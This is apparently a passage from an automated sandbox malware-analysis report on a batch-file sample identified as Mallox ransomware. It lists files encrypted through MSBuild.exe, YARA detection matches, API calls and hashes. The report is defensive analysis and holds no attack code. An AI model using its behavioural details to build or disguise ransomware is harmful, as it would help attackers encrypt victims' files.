        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt entropy: 7.99375346271Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js entropy: 7.9989740788Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\7z.sfx entropy: 7.99741751392Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js entropy: 7.99727310726Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.99758810388Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak entropy: 7.9997724135Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js entropy: 7.99751200469Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak entropy: 7.99969463537Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb entropy: 7.99742033399Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99759263881Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf entropy: 7.99902909071Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js entropy: 7.99901303482Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js entropy: 7.99885568613Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js entropy: 7.99900455271Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js entropy: 7.99861278836Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf entropy: 7.99908107044Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar\strings.json entropy: 7.99026165454Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif entropy: 7.99931344241Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js entropy: 7.99908932529Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak entropy: 7.99755418025Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt entropy: 7.99369115175Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js entropy: 7.99852981648Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak entropy: 7.99978500552Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json entropy: 7.99759663757Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json entropy: 7.99086758173Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99483967996Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json entropy: 7.99671105428Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json entropy: 7.99725290951Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json entropy: 7.99706540459Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json entropy: 7.99714914189Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json entropy: 7.99626905199Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json entropy: 7.99701805828Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json entropy: 7.99734697743Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json entropy: 7.99690065268Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json entropy: 7.99655393203Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json entropy: 7.99695278424Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json entropy: 7.99694018785Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99370960229Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99168635492Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout\checkoutdata.json entropy: 7.9957221145Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99017695016Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json entropy: 7.9965179286Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json entropy: 7.99693369217Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json entropy: 7.99719497745Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json entropy: 7.99757737885Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js entropy: 7.99840645535Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js entropy: 7.99803471792Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json entropy: 7.99629308105Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js entropy: 7.99858703327Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js entropy: 7.99874557714Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json entropy: 7.99518592009Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js entropy: 7.99338163845Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb entropy: 7.99699452616Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json entropy: 7.99606488323Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb entropy: 7.99638333887Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb entropy: 7.99053084167Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js entropy: 7.99881286109Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb entropy: 7.99463965477Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb entropy: 7.99650594412Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store entropy: 7.997131042Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\safety_tips.pb entropy: 7.99684853058Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\crs.pb entropy: 7.99930622317Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history entropy: 7.99085037418Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State entropy: 7.99568992763Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb entropy: 7.99082475951Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb entropy: 7.99204575235Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb entropy: 7.99546500998Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb entropy: 7.99161305025Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js entropy: 7.99894233986Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ES entropy: 7.99732013392Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules entropy: 7.99893105419Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-DE entropy: 7.99765807452Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules-AA entropy: 7.99825149386Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\LICENSE entropy: 7.99219354283Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\LICENSE entropy: 7.99197195487Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2 entropy: 7.99525796248Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0 entropy: 7.99453769337Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-RU entropy: 7.99898793559Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-FR entropy: 7.99869147239Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-NL entropy: 7.99610124669Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.2.etl.xollam (copy) entropy: 7.997477962Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.1.etl.xollam (copy) entropy: 7.99801214762Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.3.etl.xollam (copy) entropy: 7.99752928933Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.4.etl.xollam (copy) entropy: 7.99795731026Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.5.etl.xollam (copy) entropy: 7.99772363387Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\USOShared\Logs\System\MoUsoCoreWorker.dbfebe04-794f-4f8d-b6b5-7687998353d7.6.etl.xollam (copy) entropy: 7.99735976142Jump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.xollam (copy) entropy: 7.99483967996Jump to dropped file

        System Summary

        barindex
        Source: 4.2.R1TftmQpuQ.bat.exe.5d12868.2.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 4.2.R1TftmQpuQ.bat.exe.5e5bd78.4.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 4.2.R1TftmQpuQ.bat.exe.5d12868.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 4.2.R1TftmQpuQ.bat.exe.5e5bd78.4.raw.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, type: UNPACKEDPEMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: 0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule to detect mallox ransomware samples. Author: Sekoia.io
        Source: Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: R1TftmQpuQ.batStatic file information: 1312943
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00407614 __EH_prolog3_GS,FindFirstVolumeW,lstrlenW,QueryDosDeviceW,GetVolumePathNamesForVolumeNameW,GetLastError,GetVolumePathNamesForVolumeNameW,FindNextVolumeW,FindVolumeClose,__EH_prolog3_GS,NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,CloseHandle,GetFileType,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CreateThread,CloseHandle,10_2_00407614
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004079B9 __EH_prolog3_GS,NtQuerySystemInformation,NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,CloseHandle,GetFileType,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CreateThread,GetCurrentProcessId,CloseHandle,CloseHandle,10_2_004079B9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004075CB NtQueryObject,SetEvent,WaitForSingleObject,10_2_004075CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040636010_2_00406360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004055AC10_2_004055AC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040465810_2_00404658
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041705710_2_00417057
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040394910_2_00403949
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00403C3410_2_00403C34
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00403D5B10_2_00403D5B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040159510_2_00401595
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004016EC10_2_004016EC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040369E10_2_0040369E
        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe 73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004095F0 appears 40 times
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2657659049.0000000007FE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSapmrhaa.exe, vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.00000000049C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000000.2094770414.0000000000B94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2673466301.0000000008480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOqglopkk.dll" vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSapmrhaa.exe, vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2393047621.00000000009A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs R1TftmQpuQ.bat
        Source: R1TftmQpuQ.bat.exe.0.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs R1TftmQpuQ.bat
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2696
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2696Jump to behavior
        Source: 4.2.R1TftmQpuQ.bat.exe.5d12868.2.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 4.2.R1TftmQpuQ.bat.exe.5e5bd78.4.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 